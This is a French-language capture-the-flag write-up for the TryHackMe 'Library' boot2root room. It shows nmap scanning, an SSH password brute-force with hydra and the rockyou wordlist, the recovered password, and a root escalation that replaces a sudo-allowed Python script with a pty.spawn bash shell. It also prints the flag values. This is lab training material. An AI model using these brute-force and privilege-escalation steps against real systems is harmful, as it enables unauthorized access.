boot2root machine for FIT and bsides guatemala CTF
https://tryhackme.com/room/bsidesgtlibrary
Reconnaissance
root@ip-10-10-114-228:~# nmap -sC -sV 10.10.161.234
Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-19 17:49 GMT
Nmap scan report for ip-10-10-161-234.eu-west-1.compute.internal (10.10.161.234)
Host is up (0.0014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA)
| 256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA)
|_ 256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Blog - Library Machine
MAC Address: 02:DB:43:11:10:4B (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds
2 ports sont ouverts: 22 et 80.
Voici le code du site.
root@ip-10-10-114-228:~# curl -s http://10.10.161.234
<!doctype html>
<html lang="en">
<head>
<title>Welcome to Blog - Library Machine</title>
<link rel="stylesheet" href="master.css" type="text/css" media="screen" />
</head>
<body>
<header>
<h1>boot2root machine for FIT and bsides Guatemala</h1>
</header>
<nav>
<ul>
<li class="selected"><a href="#">Blog</a></li>
<li><a href="#">About</a></li>
<li><a href="#">Archives</a></li>
<li><a href="#">Contact</a></li>
</ul>
</nav>
<section id="intro">
<header>
<h2>Hack the planet!!!</h2>
</header>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut.</p>
<img src="logo.png" alt="Flower" />
</section>
<div id="content">
<div id="mainContent">
<section>
<article class="blogPost">
<header>
<h2>This is the title of a blog post</h2>
<p>Posted on <time datetime="2009-06-29T23:31+01:00">June 29th 2009</time> by <a href="#">meliodas</a> - <a href="#comments">3 comments</a></p>
</header>
<div>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin euismod tellus eu orci imperdiet nec rutrum lacus blandit. Cras enim nibh, sodales ultricies elementum vel, fermentum id tellus. Proin metus odio, ultricies eu pharetra dictum, laoreet id odio. Curabitur in odio augue. Morbi congue auctor interdum. Phasellus sit amet metus justo. Phasellus vitae tellus orci, at elementum ipsum. In in quam eget diam adipiscing condimentum. Maecenas gravida diam vitae nisi convallis vulputate quis sit amet nibh. Nullam ut velit tortor. Curabitur ut elit id nisl volutpat consectetur ac ac lorem. Quisque non elit et elit lacinia lobortis nec a velit. Sed ac nisl sed enim consequat porttitor.</p>
<img src="logo.png" alt="Flower" />
<p>Pellentesque ut sapien arcu, egestas mollis massa. Fusce lectus leo, fringilla at aliquet sit amet, volutpat non erat. Aenean molestie nibh vitae turpis venenatis vel accumsan nunc tincidunt. Suspendisse id purus vel felis auctor mattis non ac erat. Pellentesque sodales venenatis condimentum. Aliquam sit amet nibh nisi, ut pulvinar est. Sed ullamcorper nisi vel tortor volutpat eleifend. Vestibulum iaculis ullamcorper diam consectetur sagittis. Quisque vitae mauris ut elit semper condimentum varius nec nisl. Nulla tempus porttitor dolor ac eleifend. Proin vitae purus lectus, a hendrerit ipsum. Aliquam mattis lacinia risus in blandit.</p>
<p>Vivamus vitae nulla dolor. Suspendisse eu lacinia justo. Vestibulum a felis ante, non aliquam leo. Aliquam eleifend, est viverra semper luctus, metus purus commodo elit, a elementum nisi lectus vel magna. Praesent faucibus leo sit amet arcu vehicula sed facilisis eros aliquet. Etiam sodales, enim sit amet mollis vestibulum, ipsum sapien accumsan lectus, eget ultricies arcu velit ut diam. Aenean fermentum luctus nulla, eu malesuada urna consequat in. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Pellentesque massa lacus, sodales id facilisis ac, lobortis sed arcu. Donec hendrerit fringilla ligula, ac rutrum nulla bibendum id. Cras sapien ligula, tincidunt eget euismod nec, ultricies eu augue. Nulla vitae velit sollicitudin magna mattis eleifend. Nam enim justo, vulputate vitae pretium ac, rutrum at turpis. Aenean id magna neque. Sed rhoncus aliquet viverra.</p></div>
</article>
</section>
<section id="comments">
<h3>Comments</h3>
<article>
<header>
<a href="#">root</a> on <time datetime="2009-06-29T23:35:20+01:00">June 29th 2009 at 23:35</time>
</header>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut.</p>
</article>
<article>
<header>
<a href="#">www-data</a> on <time datetime="2009-06-29T23:40:09+01:00">June 29th 2009 at 23:40</time>
</header>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut.</p>
</article>
<article>
<header>
<a href="#">Anonymous</a> on <time datetime="2009-06-29T23:59:00+01:00">June 29th 2009 at 23:59</time>
</header>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut.</p>
</article>
</section>
<form action="#" method="post">
<h3>Post a comment</h3>
<p>
<label for="name">Name</label>
<input name="name" id="name" type="text" required />
</p>
<p>
<label for="email">E-mail</label>
<input name="email" id="email" type="email" required />
</p>
<p>
<label for="website">Website</label>
<input name="website" id="website" type="url" />
</p>
<p>
<label for="comment">Comment</label>
<textarea name="comment" id="comment" required></textarea>
</p>
<p><input type="submit" value="Post comment" /></p>
</form>
</div>
</div>
<footer>
<div>
</div>
</footer>
</body>
On trouve des noms potentiels d’utilisateur: meliodas, root, www-data, Anonymous.
Voici ce que nous retourne le fichier robots.txt
root@ip-10-10-114-228:~# curl -s http://10.10.161.234/robots.txt
User-agent: rockyou
Disallow: /Nous allons essayer de trouver le mot de passe de Meliodas avec hydra.
root@ip-10-10-114-228:~/Desktop/Tools/wordlists# hydra -l meliodas -P rockyou.txt ssh://10.10.161.234
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2022-12-19 17:57:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.161.234:22/
[22][ssh] host: 10.10.161.234 login: meliodas password: iloveyou1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 10 final worker threads did not complete until end.
[ERROR] 10 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2022-12-19 17:58:17
Testons maintenant une connexion en SSH.
root@ip-10-10-114-228:~# ssh meliodas@10.10.161.234
The authenticity of host '10.10.161.234 (10.10.161.234)' can't be established.
ECDSA key fingerprint is SHA256:sKxkgmnt79RkNN7Tn25FLA0EHcu3yil858DSdzrX4Dc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.161.234' (ECDSA) to the list of known hosts.
meliodas@10.10.161.234's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Sat Aug 24 14:51:01 2019 from 192.168.15.118
meliodas@ubuntu:~$ ls
bak.py user.txt
meliodas@ubuntu:~$ cat user.txt
6d488cbb3f111d135722c33cb635f4ec
Nous sommes bien connecté et pouvons directement récupérer le flag user.txt.
Regardons maintenant les commandes avec privilèges pour meliodas.
meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User meliodas may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
Nous pouvons utiliser le script bak.py sans mot de passe.
Voici le script bak.py
meliodas@ubuntu:~$ cat /home/meliodas/bak.py
#!/usr/bin/env python
import os
import zipfile
def zipdir(path, ziph):
for root, dirs, files in os.walk(path):
for file in files:
ziph.write(os.path.join(root, file))
if __name__ == '__main__':
zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
zipdir('/var/www/html', zipf)
zipf.close()
meliodas@ubuntu:~$Malheureusement, nous ne pouvons pas modifier ce script: nous n’avons pas les droits.
meliodas@ubuntu:~$ ls -la /home/meliodas/bak.py
-rw-r--r-- 1 root root 353 Aug 23 2019 /home/meliodas/bak.py
Ce fichier est dans notre répertoire /home. Nous allons donc le supprimer et en recréer un pour générer un shell root.
meliodas@ubuntu:~$ cd /home/meliodas
meliodas@ubuntu:~$ rm -f bak.py
meliodas@ubuntu:~$ nano bak.py
Nous allons juste mettre ce code dans le script.
#!/usr/bin/env python
import pty
pty.spawn("/bin/bash")Puis nous l’exécutons et récupérons le flag root.
meliodas@ubuntu:~$ sudo /usr/bin/python3 /home/meliodas/bak.py
root@ubuntu:~# ls
bak.py user.txt
root@ubuntu:~# cat /root/root.txt
e8c8c6c256c35515d1d344ee0488c617